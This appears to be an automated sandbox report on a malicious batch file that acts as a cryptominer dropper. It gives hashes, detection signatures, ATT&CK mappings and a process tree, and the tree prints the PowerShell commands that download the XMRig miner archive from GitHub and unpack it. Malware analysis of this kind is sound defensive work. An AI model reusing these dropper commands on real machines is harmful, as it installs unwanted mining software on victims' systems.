Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    9.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2808

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZSO1TBB59OVPIH8WME4B.temp
    Filesize

    7KB

    MD5

    6d87614f3378fdeba8804a3ee26fdc26

    SHA1

    f7a8c02efba2140975afc73d6c301a3a06da64c7

    SHA256

    55fb47939d4bb3e24a893ace50826c3561dcc836406bf9436ea6540e3d0266ea

    SHA512

    8eac3a3cbf67af69e659371cf7cd114261f84bd23121740b611f95e8ff6e8e257e09c589745977e4d91cfeec9994b39873d003e594e66d90cd0a1562df4254e7

  • memory/2784-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp
    Filesize

    4KB

  • memory/2784-5-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
    Filesize

    2.9MB

  • memory/2784-6-0x00000000023F0000-0x00000000023F8000-memory.dmp
    Filesize

    32KB

  • memory/2784-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
    Filesize

    9.6MB

  • memory/2784-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
    Filesize

    9.6MB

  • memory/2784-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
    Filesize

    9.6MB

  • memory/2784-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
    Filesize

    9.6MB

  • memory/2784-11-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
    Filesize

    9.6MB

  • memory/2784-12-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
    Filesize

    9.6MB

  • memory/2808-18-0x000000001B2A0000-0x000000001B582000-memory.dmp
    Filesize

    2.9MB

  • memory/2808-19-0x0000000001F40000-0x0000000001F48000-memory.dmp
    Filesize

    32KB